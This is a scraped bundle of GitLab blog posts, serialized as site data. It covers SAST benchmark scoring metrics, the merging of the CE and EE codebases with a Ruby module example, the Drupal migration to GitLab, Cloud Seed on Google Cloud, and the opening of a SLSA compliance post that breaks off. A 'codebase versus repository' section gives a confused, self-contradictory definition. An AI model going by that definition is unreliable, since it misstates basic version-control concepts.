\n\n``` mermaid\nflowchart LR;\nsbx[gl-sast-report.json];\nbreport[Report];\nconfig[Configuration];\n\nconfig --> bf;\n\nsubgraph Baseline\n  bcollection[app];\n  baseline[expectation];\nend\n\nsubgraph bf [ Benchmarking Framework ]\n   orig(Analyzer);\n   compare(Compare);\n   orig --> sbx;\n   sbx --> compare;\nend\n\nbaseline --> compare;\ncompare --> breport\nbcollection --> orig\n```\n\nUsing the security report format as a common standard makes the benchmarking\nframework very versatile: the baseline could be provided by an automated\nprocess, by another analyzer, or manually, which happened to be the case in this\nGSoC project.\n\n### Scoring\n\nThe main functionality of the [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nis to compute the overlap/intersection, and difference between a baseline and\ngenerated report in order to uncover true positives, false positives, and false\nnegatives. \n\nThe relationship between _TP_, _FP_, _FN_, _TN_, baseline, and generated report can be\nseen in the table below; it includes three columns `analyzer`, `baseline` and\n`classification`. The column `analyzer` represents the findings included in the\nreport generated by the analyzer; column `baseline` represents the findings\nincluded in the baseline; column `classification` denotes the\nverdict/classification that the [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nattaches to the analyzer finding when performing the comparison. 
The `X` and\n`-` denote reported and non-reported findings, respectively.\n\n| analyzer | baseline | classification |\n| -------- | -------  | -------------  |\n| -        | -        | _TN_           |\n| -        | X        | _FN_           |\n| X        | -        | _FP_           |\n| X        | X        | _TP_           |\n\nThe `classification` column in the table above shows that a _TP_ is a\nvulnerability existing in both baseline and generated report; similarly, an\n_FP_ is a vulnerability detected by an analyzer without a corresponding\nbaseline entry, while an _FN_ is a vulnerability present in the baseline but\nnot detected by an analyzer. Note, that _TN_ is practically not relevant for\nour use-case since the analyzers we are looking at only report unsafe,\nvulnerable cases instead of safe, non-vulnerable cases. \n\nAt the moment, the `evaluator` tool computes the metrics below:\n- Precision: _P_ = _TP_ /( _TP_ + _FP_ )\n- Recall: _R_ = _TP_ / ( _TP_ + _FN_ )\n- F-Score: _F_ = 2 * ( _P_ * _R_ ) / ( _P_ + _R_ ) \n- Jaccard-Index: _J_ = _TP_ / ( _TP_ + _FP_ + _FN_ )\n\nA higher precision indicates that an analyzer is less noisy due to the low(er)\nnumber of _FPs_. Hence, a high precision leads to a reduction of auditing effort\nof irrelevant findings. A high recall represents an analyzer's detection\ncapacity. F-Score is a combined measure so that precision and recall can be\ncondensed to a single number. 
The Jaccard-Index is a single value to capture\nthe similarity between analyzer and baseline.\n\nThe [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nsupports the addition of custom metrics via a simple call-back mechanism; this\nenables us to add support for more metrics in the future that help us to gain\nadditional or new insights with regards to the efficacy of our analyzers.\n\n### Framework Properties\n\nIn principle, the implemented benchmarking framework is language-agnostic: new\nanalyzers and baselines can be plugged-in as long as they adhere to the\n[security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format). \n\nEstablishing baselines is laborious since it requires (cross-)validation, \ntrying out attacks on the running baseline application and\ncode auditing.\n\nFor the GSoC project, we established baselines for the applications below\ncovering Java ([Spring](https://spring.io/)) and Python\n([Flask](https://flask.palletsprojects.com/)) as they are [ranking high in the most used languages and frameworks](https://survey.stackoverflow.co/2022/#technology-most-popular-technologies). \nFor a benchmark application to have practical utility, it is important that the\napplication itself is based on technology, including programming languages and\nframeworks, that are used in the industry.\n\nFor both of these applications, the baseline/expectations have been collected,\nverified and are publicly available: \n- [WebGoat](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/WebGoat/-/tree/baselines). \n  WebGoat is a deliberately insecure Web application used to teach security vulnerabilities.\n  We chose this as a baseline application because it is often used as a benchmark\n  app in the Java world and it is based on [Spring](https://spring.io/) which is\n  one of the most popular frameworks in the Java world. 
\n- [vuln-flask-web-app](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/vuln-flask-web-app/-/tree/report) Like WebGoat, this application is deliberately insecure. `vuln-flask-web-app` covers both Python and [Flask](https://flask.palletsprojects.com/en/2.2.x/), one of the most popular web frameworks in the Python world.\n\n## Conclusion\n\nThis GSoC project was a first step towards building a FOSS benchmarking\nframework that helps the community to test their own tools and to build up a\nrelevant suite of baselines covering various languages and frameworks. With the\nhelp of the community, we will continue adding more baselines to the\nbenchmarking framework in the future to cover more languages and frameworks.\n\nIf you found the project interesting, you might want to check out the following repositories:\n\n- [evaluator](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\n- [WebGoat baseline](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/WebGoat/-/tree/baselines)\n- [Vulnerable Flask Web App baseline](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/vuln-flask-web-app/-/tree/report)\n- [Example of downstream pipeline triggering evaluator](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator-downstream)\n\nCover image by [Maxim Hopman](https://unsplash.com/@nampoh) on [Unsplash](https://unsplash.com/photos/fiXLQXAhCfk)\n{: .note}\n",[779,780,9],"collaboration","google",{"slug":782,"featured":6,"template":689},"a-benchmarking-framework-for-sast","content:en-us:blog:a-benchmarking-framework-for-sast.yml","A Benchmarking Framework For 
Sast","en-us/blog/a-benchmarking-framework-for-sast.yml","en-us/blog/a-benchmarking-framework-for-sast",{"_path":788,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":789,"content":795,"config":804,"_id":806,"_type":14,"title":807,"_source":16,"_file":808,"_stem":809,"_extension":19},"/en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition",{"title":790,"description":791,"ogTitle":790,"ogDescription":791,"noIndex":6,"ogImage":792,"ogUrl":793,"ogSiteName":673,"ogType":674,"canonicalUrls":793,"schema":794},"Why GitLab uses one codebase for Community & Enterprise","Dive into our decision to switch GitLab over to a single codebase as we review some of the benefits and challenges. Learn more here!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671631/Blog/Hero%20Images/merge-ce-ee-codebases.jpg","https://about.gitlab.com/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Update: Why GitLab uses a single codebase for Community and Enterprise editions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Yorick Peterse\"}],\n        \"datePublished\": \"2019-08-23\"\n      }",{"title":796,"description":791,"authors":797,"heroImage":792,"date":799,"body":800,"category":801,"tags":802},"Update: Why GitLab uses a single codebase for Community and Enterprise editions",[798],"Yorick Peterse","2019-08-23","\n\nIn [\"GitLab might move to a single Rails\ncodebase\"](/blog/merging-ce-and-ee-codebases/), we announced that GitLab\nmight move to using a single codebase for GitLab Community Edition (CE) and\nGitLab Enterprise Edition (EE). Since then we have decided to continue moving\ntoward a single codebase. In this article, I highlight some of the challenges,\nrequired work, and steps remaining to complete the switch.\n\n## What is a codebase?\n\nWhat is a codebase, I hear you ask? 
Well, a codebase (which is at times spelled as code base) is essentially the entire collection of source \ncode that is required for a program or application to function properly. This can include things like configuration \nfiles, libraries, and other dependencies, in addition to the actual application code. The codebase is \ntypically stored in a single location, often within a source control repository, where multiple developers \ncan access and make contributions to it.\n\nMultiple developers can use and contribute to a single codebase, which is generally retained within a source control \nrepository. As such, it can assist with the backup and versioning of overlapping code \nmodifications/alterations. This can be especially important for larger projects that require a lot of coordination \nand communication between team members. With everyone working from the same codebase, it becomes easier \nto ensure that changes are made consistently and in a way that does not break the application.\n\n## Why GitLab uses a single codebase?\n\nPrior to using a single codebase, for years CE and EE used two different repositories for the Rails application.\nBy using separate repositories we could separate proprietary code from code that\nis free software. On the surface this seems like a good idea for different\nreasons (e.g., licensing), but over the years the drawbacks\nbegan to outweigh the benefits.\n\nWe [mention some of these drawbacks in a previous\narticle](/blog/merging-ce-and-ee-codebases/), but more or less they all\ncome down to the same core problem: It made the development process more complex\nthan necessary. For example, we ended up with around 150 merge requests spread\nacross CE and EE for a security release from several months ago. While the\nprocess of merging these merge requests is automated, we ran into a variety of\nissues (e.g. failing tests) that required manual intervention. 
We could have\nreduced the number of merge requests by half if we used a single repository,\ncreating less work for developers and release managers.\n\nToward the end of 2018, I felt that we were running out of time and had to do\nsomething about the separation of CE and EE. We had always tried to avoid\nmerging the two repositories due to the complexity and time involved, but it\nstarted to become more and more clear we had no other option. [Marin\nJankovski](/company/team/#maxlazio), Delivery engineering manager, and I made a\nplan to merge the two repositories. Marin wrote a [design\ndocument](/handbook/engineering/infrastructure/library/merge-ce-ee-codebases/)\nthat outlined the details of it all. The design document showed what challenges\nwe faced, and gathered the critical support required for the largest engineering\nprojects at GitLab to date.\n\n## What is the difference between a codebase and a repository?\n\nThe basic difference between a codebase and a repository is that one is for old code and one is for new code. \n\nBut more specifically...\n\nA codebase can be either a public or private place to store large amounts of code that is actively being iterated on in a version control system, and typically stored in a source control repository in a version control system.\n\nA source code repository is where an archived version of the code being worked on is kept. It’s also a place to house documentation, notes, web pages, and other items in your repository. \n \n## Working toward a single codebase\n\nMoving to a single codebase is not something we can do overnight for a project\nthe size of GitLab. Workflows must be adapted, developers need to adjust to the\nnew setup, and automation requires extensive changes.\n\nOne of the biggest challenges from an engineering perspective was to come up\nwith a way to transparently remove proprietary code from GitLab when building a\nCE release. 
A naive approach might involve a script that removes known bits of\nproprietary code. While this might work for small projects that don't change\noften, this was not going to work for a project the size of GitLab.\n\nRuby provides us with a solution to this problem. In Ruby, you can create a\nmodule and inject it into another module or class. Once injected, the\nfunctionality of the module becomes available to the target module or class.\nThis is best illustrated with a simple example:\n\n```ruby\nclass Person\n  def initialize(name)\n    @name = name\n  end\n\n  def name\n    @name\n  end\nend\n\nmodule Greet\n  def greet\n    \"Hello #{name}\"\n  end\nend\n\nPerson.include(Greet)\n\nalice = Person.new('Alice')\n\nalice.greet # => \"Hello Alice\"\n```\n\nHere we define a class `Person`, followed by a module that is used to create a\nmessage greeting a person. Next, we include it into the `Person` class, at which\npoint we can use the module's methods for instances of the `Person` class. The\nresult is the message \"Hello Alice.\"\n\nWhile this example is not exciting, using a setup like this allows us to\nmove proprietary code to separate modules, and inject these modules when GitLab\nEE is used. For GitLab CE, we would remove these modules, and the code injecting\nthese modules would have to disable itself transparently and automatically.\n\nGitLab EE has been using this setup since late 2016 with all EE modules residing\nin a separate \"ee\" directory, but in a limited number of places. This meant that\nin some places EE and CE code got mixed together, while in other places the two\nare separate. For example, we had code like this:\n\n```diff\n def lfs_upload_access?\n   return false unless project.lfs_enabled?\n   return false unless has_authentication_ability?(:push_code)\n+  return false if project.above_size_limit? || objects_exceed_repo_limit?\n\n   lfs_deploy_token? 
|| can?(user, :push_code, project)\n end\n```\n\nHere EE added a line into an existing method without using a separate module,\nmaking it difficult to remove the EE-specific code when building for CE.\n\nBefore we could move to a single codebase, we had to separate EE-specific code from code shared between CE and EE. Due to the amount\nof work necessary, we divided the work into two departments: backend and\nfrontend. For every department we created issues outlining the work to do for\nthe various parts of the codebase. We even included the [exact lines of code\nthat had to change directly in the created\nissues](https://gitlab.com/gitlab-org/gitlab-ee/issues/9506), making it simple\nto see what one had to do. Each department also had an engineer assigned as the\nlead engineer, responsible for taking on the most difficult challenges.  [Filipa\nLacerda](/company/team/#FilipaLacerda), senior frontend engineer of Verify (CI)\nand Delivery, was in charge of frontend code. [As the Delivery backend engineer,\nI myself](/company/team/#yorickpeterse) was in charge of backend code.\n\nSome changes were small and took a short amount of time, while others were big\nand took weeks. One of my big challenges was to make sure CE and EE [use the same\ndatabase schema](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/26940),\nchanging just under 24,000 lines of code over a two-month period.\n\n>In total the work involved 55\ndifferent engineers submitting more than 600 merge requests, closing just under\n400 issues, and changing nearly 1.5 million lines of code\n\nFilipa spent a lot of time creating 168 frontend issues outlining specific tasks\nas well as submitting 124 merge requests to address the majority of these\nissues. 
Resolving some of these issues required getting rid of some\ntechnical debt first, such as [breaking up large chunks of code into smaller\nchunks](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/14592), and\ncoming up with a way [to create EE-specific Vue.js\ntemplates](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/25650).\n\nWhile Filipa and I took on the biggest challenges, in total the work involved 55\ndifferent engineers submitting more than 600 merge requests, closing just under\n400 issues, and changing nearly 1.5 million lines of code.\n\n## Moving toward a single codebase\n\nWith most of the work done, we could start looking into what project setup we\nwould use for a single codebase. We came up with three different approaches:\n\n### 1. Single codebase: moving all development into gitlab-ce\n\nAll code and development is moved into the gitlab-ce repository. The gitlab-ee\nrepository is archived, and a separate repository is set up as a mirror of\ngitlab-ce, called gitlab-foss. Proprietary code is removed from this mirror\nautomatically.\n\nSince most of GitLab's development takes place in the current gitlab-ce\nrepository, this setup would reduce the number of issues to move as well as merge requests to close. A downside of this approach is that clones of\nthe gitlab-ce repository will include proprietary code.\n\n### 2. Single codebase: moving all development into gitlab-ee\n\nAll code and development is moved into the gitlab-ee repository. The gitlab-ce\nrepository remains as is in terms of code, and will become a mirror of gitlab-ee. Like\nthe first option, proprietary code is removed from this mirror automatically.\n\nThis setup means that users cloning gitlab-ce don't end up with proprietary code\nin their copy of gitlab-ce.\n\n### 3. Single codebase: moving all development into a new repository\n\nWe set up an entirely new repository called \"gitlab,\" and move all code and\ndevelopment into this repository. 
The gitlab-ce and gitlab-ee repositories will\nbecome read-only. A mirror is set up (called \"gitlab-foss\") that mirrors the new\n\"gitlab\" repository, without including proprietary code.\n\n## Deciding which single codebase approach to take\n\n[Having evaluated all the benefits and\ndrawbacks](https://www.youtube.com/watch?v=LV_AHeL5sIo), we decided to go with\noption two: move development into gitlab-ee. This approach has several benefits:\n\n1. The code of the gitlab-ce repository remains as is, and won't include any\n   proprietary code.\n1. We do not need a separate mirror repository that does not include proprietary\n   code. Instead, we rename the gitlab-ce repository to \"gitlab-foss.\" We are\n   renaming the repository since having \"gitlab\" and \"gitlab-ce\" as project\n   names could be confusing.\n1. Users building CE from source don't end up with proprietary code in their\n   copy of the gitlab-ce repository.\n1. We keep the Git logs of both gitlab-ce and gitlab-ee, instead of losing the\n   logs (this depends a bit on how we'd move repositories around).\n1. It requires the least amount of changes to our workflow and tooling.\n1. Using a single project and issue tracker for both CE and EE makes it easier\n   to search for issues.\n\nIssues created in the gitlab-ce project will move to the gitlab-ee project,\nwhich we will rename to just \"gitlab\" (or \"gitlab-org/gitlab\" if you include the\ngroup name). This project then becomes the single source of truth, and is used\nfor creating issues for both the CE and EE distributions.\n\nMoving merge requests across projects is not possible, so we will close any open\nmerge requests. 
Authors of these merge requests will have to resubmit them to\nthe \"gitlab\" (called \"gitlab-ee\" before the rename) project.\n\nWhen moving issues or closing merge requests, a bot will also post a comment\nexplaining why this is done, what steps the author of a merge request has to\ntake, and where one might find more information about these procedures.\n\nPrior to the single codebase setup, GitLab community contributions would be submitted\nto the gitlab-ce repository. In the single codebase, contributions are instead\nsubmitted to the new gitlab repository (\"gitlab-org/gitlab\"). EE-specific code\nresides in a \"ee\" directory in the repository. Code outside of this directory\nwill be free and open source software, using the same license as the gitlab-ce\nrepository currently uses. This means that as long as you do not change anything\nin this \"ee\" directory, the only change for GitLab community contributions is the use\nof a different repository.\n\nOur current plan is to have a single codebase the first week of September.  GitLab 12.3 will be the first release based on a single codebase.\n\nUsers that clone GitLab EE and/or GitLab CE from source should update their Git\nremote URLs after the projects are renamed. This is not strictly necessary as\nGitLab will redirect Git operations to the new repository. 
For users of our\nOmnibus packages and Docker images nothing changes.\n\nThose interested in learning more about what went on behind the scenes can refer\nto the following resources:\n\n* [A video in which we discusses the benefits and drawbacks of the various\n  project setups](https://www.youtube.com/watch?v=LV_AHeL5sIo)\n* [The issue detailing the remaining work to do](https://gitlab.com/gitlab-org/gitlab-ee/issues/13304)\n* [A list of all the single codebase merge requests](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&label_name%5B%5D=single%20codebase)\n\nCover image from [Unsplash](https://images.unsplash.com/photo-1512217536414-d92543c79ca1)\n{: .note}\n","engineering",[803,9],"inside GitLab",{"slug":805,"featured":6,"template":689},"a-single-codebase-for-gitlab-community-and-enterprise-edition","content:en-us:blog:a-single-codebase-for-gitlab-community-and-enterprise-edition.yml","A Single Codebase For Gitlab Community And Enterprise Edition","en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition.yml","en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition",{"_path":811,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":812,"content":818,"config":824,"_id":826,"_type":14,"title":827,"_source":16,"_file":828,"_stem":829,"_extension":19},"/en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab",{"title":813,"description":814,"ogTitle":813,"ogDescription":814,"noIndex":6,"ogImage":815,"ogUrl":816,"ogSiteName":673,"ogType":674,"canonicalUrls":816,"schema":817},"A visual prototype of Drupal.org's GitLab integration","Guest author Tim Lehnen shares a visual preview of free and open source platform Drupal's upcoming integration with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671386/Blog/Hero%20Images/drupal-cover.png","https://about.gitlab.com/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab","\n                     
   {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A visual prototype of Drupal.org's GitLab integration\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tim Lehnen\"}],\n        \"datePublished\": \"2018-12-19\",\n      }",{"title":813,"description":814,"authors":819,"heroImage":815,"date":821,"body":822,"category":10,"tags":823},[820],"Tim Lehnen","2018-12-19","\nAt [Drupal Europe](https://www.drupaleurope.org) in September, we were very pleased that project founder [Dries Buytaert](https://dri.es) highlighted a visual prototype of our upcoming integration with GitLab in his keynote. This follows our announcement that we'd be [moving to GitLab](/blog/drupal-moves-to-gitlab/) back in August.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/q06taaJPGDw?rel=0&amp;showinfo=0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nThis video outlines the migration phases that we discussed [in the announcement of our partnership with GitLab](https://www.drupal.org/drupalorg/blog/developer-tools-initiative-part-5-gitlab-partnership). Our migration window for Phase 1 is targeted for the first weeks of January, and we hope Phase 2 to be completed shortly in the beginning of 2019.\n\n## So what has it taken to get this integration working between September and now?\n\nPrimarily, lots of collaboration with the GitLab team. 
We've worked with their excellent engineering staff to resolve a number of issues that affect our integration, including:\n\n- [git merge-base web API](https://gitlab.com/gitlab-org/gitlab-ce/issues/49850)\n- [Add ability to confirm a user’s email address via \"Add email for user\" API](https://gitlab.com/gitlab-org/gitlab-ce/issues/50876)\n- [Allow configuration of the display URL for clone instructions](https://gitlab.com/gitlab-org/gitlab-ce/issues/49698)\n- [Ability to hide User's Email Address from GitLab UI](https://gitlab.com/gitlab-org/gitlab-ce/issues/24221)\n- [Allow ability for developer role to delete tags](https://gitlab.com/gitlab-org/gitlab-ce/issues/52954)\n- [Set GL_REPOSITORY in update hooks for API-initiated requests](https://gitlab.com/gitlab-org/gitaly/issues/1402)\n- [Deduplication of Git objects, reducing disk space of repository forks](https://gitlab.com/gitlab-org/gitlab-ce/issues/23029)\n\nOn the Drupal.org side:\n\n - We've built a [`versioncontrol_gitlab` module](https://www.drupal.org/project/versioncontrol_gitlab), which extends our use of the [`versioncontrol_git` module](https://www.drupal.org/project/versioncontrol_git) to orchestrate our integration.\n - We've also been cleaning up our data, to ensure there are no namespace conflicts between existing Drupal projects and users, and the reserved terms used by GitLab.\n\nWe're now in the midst of serious migration testing: testing and re-testing the process in our staging environment, putting load testing in place to stress test our integration, and doing user-validation testing to ensure that the workflows affected by this integration are working as expected.\n\nAll in all, we're thrilled with the progress, and very thankful for GitLab's close collaboration. We're excited to be moving the Drupal project to its next generation tooling soon. 
Once Phase 1 of our migration is complete, it'll be time for Phase 2 and our community will start seeing some tremendous improvements in efficiency and collaboration.\n\n## How can people get involved in Drupal?\n\nThe Drupal community has a comprehensive [Getting Involved Guide](https://www.drupal.org/getting-involved-guide) that can help individuals find their place in the Drupal community. There are also meetups and conferences around the world that are a great way to start your Drupal journey. In particular, [DrupalCon will be coming to Seattle from Apr. 8-12, 2019](https://events.drupal.org/seattle2019).\n\nThe Drupal project's motto has always been \"Come for the code, stay for the community\" and 17 years later, that's a sentiment we still believe in.\n\n### About the guest author\n\nTim Lehnen is the Executive Director at the [Drupal Association](https://www.drupal.org/association).\n\n_This guest post was originally published [on the Drupal blog](https://www.drupal.org/drupalorg/blog/a-visual-prototype-of-drupalorgs-integration-with-gitlab)._\n",[9,267,231],{"slug":825,"featured":6,"template":689},"a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab","content:en-us:blog:a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab.yml","A Visual Prototype Of Drupal Dot Orgs Integration With Gitlab","en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab.yml","en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab",{"_path":831,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":832,"content":838,"config":846,"_id":848,"_type":14,"title":849,"_source":16,"_file":850,"_stem":851,"_extension":19},"/en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud",{"title":833,"description":834,"ogTitle":833,"ogDescription":834,"noIndex":6,"ogImage":835,"ogUrl":836,"ogSiteName":673,"ogType":674,"canonicalUrls":836,"schema":837},"GitLab & Google Cloud partnership accelerates cloud 
adoption","Learn how Cloud Seed came about and how it will help speed app modernization.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665811/Blog/Hero%20Images/daytime-clouds.jpg","https://about.gitlab.com/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Accelerate cloud adoption with GitLab's open source partnership with Google Cloud\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sri Rangan\"}],\n        \"datePublished\": \"2022-10-11\",\n      }",{"title":839,"description":834,"authors":840,"heroImage":835,"date":842,"body":843,"category":10,"tags":844},"Accelerate cloud adoption with GitLab's open source partnership with Google Cloud",[841],"Sri Rangan","2022-10-11","\nSince December 2021, GitLab Incubation has partnered with Google Cloud to develop\nsolutions that will help customers address one of their biggest business requirements: accelerating cloud adoption.\n\nWe are thrilled to announce the release of Cloud Seed at Google Cloud Next 2022,\nand we are even more excited to follow up with our community. Cloud Seed is an open\nsource partnership between GitLab and Google Cloud to accelerate cloud adoption and\napp modernization.\n\nThe origins of Cloud Seed date back to late 2020 when I worked closely with GitLab co-founder and CEO [Sid Sijbrandij]( /company/team/#sytses) on an experiment called “5 Minute Production\". Our focus was to improve developer experience while consuming cloud services and enabling DevSecOps best practices by default.\n\nFor this, GitLab needed to collaborate with the hyper clouds, and Google Cloud emerged as our natural choice. 
In this post I’d like to shed light on our collaboration, the results our partnership has achieved, and the positive business outcomes our customers will realize.\n\n## Refining the use case\n\nFirst, we reached out and polled our customers to try and understand their cloud adoption use cases. \n\nWe found the enterprise market segment focused on migrating existing systems to the cloud to achieve their digital transformation targets, while the SMB and startup segment focused on embracing the cloud for greenfield initiatives.\n\n## Cloud Run and Cloud SQL\n\nWhile motivations for enterprise and SMB segments varied, the underlying use case —– deploying web applications to the cloud —– remained the same. Thus, we selected two of the more popular Google Cloud managed services that web applications make use of: [Cloud Run](https://cloud.google.com/run) and [Cloud SQL](https://cloud.google.com/sql).\n\nCloud Run makes it possible to build and deploy scalable containerized apps written in any language (including Go, Python, Java, Node.js, .NET, and Ruby) on a fully managed platform. Meanwhile, Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server with rich extension collections, configuration flags, and developer ecosystems.\n\n## Open source collaboration\n\nGitLab comes with a rich tradition of [open source](/solutions/open-source/). Our partners at Google Cloud understood and complemented that remarkably, which made for a close collaboration between our two teams. 
We agreed quite early in the process that all capabilities built within Cloud Seed will be open source and, therefore, available for all GitLab users regardless of their market segment, license tier, or any other consideration.\n\n## Preview environments on Cloud Run\n\nThe Cloud Seed private beta was made available to trusted testers in May 2022, and based on the successful beta program, Preview Environments with GitLab and Cloud Run emerged among the most popular use cases.\n\n**Take a look at Preview Environments on GitLab with Cloud Seed:**\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/zDMGCyAgCPY\" title=\"Preview Environments on GitLab with Cloud Seed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n\nMost Git-based development workflows make use of temporary feature branches. In larger teams and organizations, it is required that feature branches are made available for review and testing.\n\nWith Cloud Seed, a Cloud Run deployment pipeline can be generated in less than two minutes that deploys all feature branches to Cloud Run. Given Cloud Run’s free tier, this can be a cost-effective method to deploy and manage preview environments.\n\n## Relational databases with Cloud SQL\n\nAnother common use case, typically in the app migration scenario, is to set up and migrate relational databases in the cloud. Our beta-test users voted for Cloud SQL as their most popular data storage option among a myriad of Google Cloud services.\n\nWith Cloud Seed, traditional relational databases such as Postgres, MySQL, and SQL Server can be spun up from the GitLab web UI. Similar to the Cloud Run workflow described above, these database instances can be made branch, tag, and environment specific. 
Alternatively, a GitLab project can be spun up for database operations, where Cloud Seed creates a suitable Cloud SQL instance while the Git repository serves as the host for configuration and migration operations.\n\n## Looking ahead\n\nOur purpose is clear: We learn from our users and customers about their use cases and needs, and we build capabilities to support them through their cloud adoption journeys. We are thrilled to announce the release of Cloud Seed at [Google Cloud Next '22](https://cloud.withgoogle.com/next), and we are even more excited to follow up with our community. Connect with us @OpenCloudSeed on Twitter and try out Cloud Seed today at GitLab.com.\n",[282,9,845],"cloud native",{"slug":847,"featured":6,"template":689},"accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud","content:en-us:blog:accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud.yml","Accelerate Cloud Adoption With Gitlabs Open Source Partnership With Google Cloud","en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud.yml","en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud",{"_path":853,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":854,"content":860,"config":868,"_id":870,"_type":14,"title":871,"_source":16,"_file":872,"_stem":873,"_extension":19},"/en-us/blog/achieve-slsa-level-2-compliance-with-gitlab",{"title":855,"description":856,"ogTitle":855,"ogDescription":856,"noIndex":6,"ogImage":857,"ogUrl":858,"ogSiteName":673,"ogType":674,"canonicalUrls":858,"schema":859},"Achieve SLSA Level 2 compliance with GitLab","Compliance mandates call for controls to prevent software tampering, improve integrity of builds and artifacts, and support attestation. 
Here's how GitLab can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667094/Blog/Hero%20Images/container-security.jpg","https://about.gitlab.com/blog/achieve-slsa-level-2-compliance-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Achieve SLSA Level 2 compliance with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-11-30\",\n      }",{"title":855,"description":856,"authors":861,"heroImage":857,"date":863,"body":864,"category":865,"tags":866},[862],"Sandra Gittlen","2022-11-30","\n\nOrganizations are under intense pressure from governing bodies to attest to the fact that their software supply chains have not been tampered with. The industry has come together to create an industry standard, Supply chain Levels for Software Artifacts ([SLSA](https://slsa.dev/)), to guide companies on exactly how to achieve such attestation. GitLab helps organizations comply with SLSA requirements by incorporating attestation capabilities into its DevSecOps platform.\n\n“Although SLSA compliance is relatively new, security-conscious DevOps teams are already adopting its requirements to demonstrate their software is trustworthy,” says [Sam White](https://gitlab.com/sam.white), Group Manager of Product for the [Govern stage](/direction/govern/) at GitLab. \n\nGitLab Federal CTO [Joel Krooswyk](https://gitlab.com/jkrooswyk) agrees. “DevOps teams will need to understand attestation as part of new government regulations around the larger release verification process. Vendors, third-party development and integration providers, and other data-sensitive industries will be required to adhere to published guidance,” he says. 
“GitLab helps companies across all sectors address these compliance mandates.”\n\n## What is SLSA?\n\nSLSA first launched in 2021 in response to calls for a framework to [secure software supply chains](/blog/the-ultimate-guide-to-software-supply-chain-security/). SLSA provides a checklist of standards and controls to prevent tampering, improve integrity, and secure packages and infrastructure. The goal is for software developers to be able to use best practices to [guarantee the integrity](/blog/securing-the-software-supply-chain-through-automated-attestation/) of each and every artifact, more specifically that the source code users are relying on is the code they are actually using and that the build machine producing the artifacts was secure.\n\nThe SLSA standard has four levels that examine the builds, sources, and dependencies in open source and commercial software. The levels build on one another, growing from simple visibility and being able to generate provenance to providing the highest assurances of build integrity and measures for dependency management.\n\nGitLab’s DevSecOps platform currently supports SLSA Levels 1 and 2. GitLab makes it simple for users to comply with these first two levels, according to White. “Whether you are working on an open source project or developing commercial software, there is no reason not to generate provenance for your code and attest to it. Even if you are just tinkering around, there is no harm in following the SLSA specifications,” he says.\n\n## How to generate artifact metadata with the GitLab Runner\n\nGitLab enables users to generate artifact metadata following the SLSA format for any artifacts that are built on the platform. 
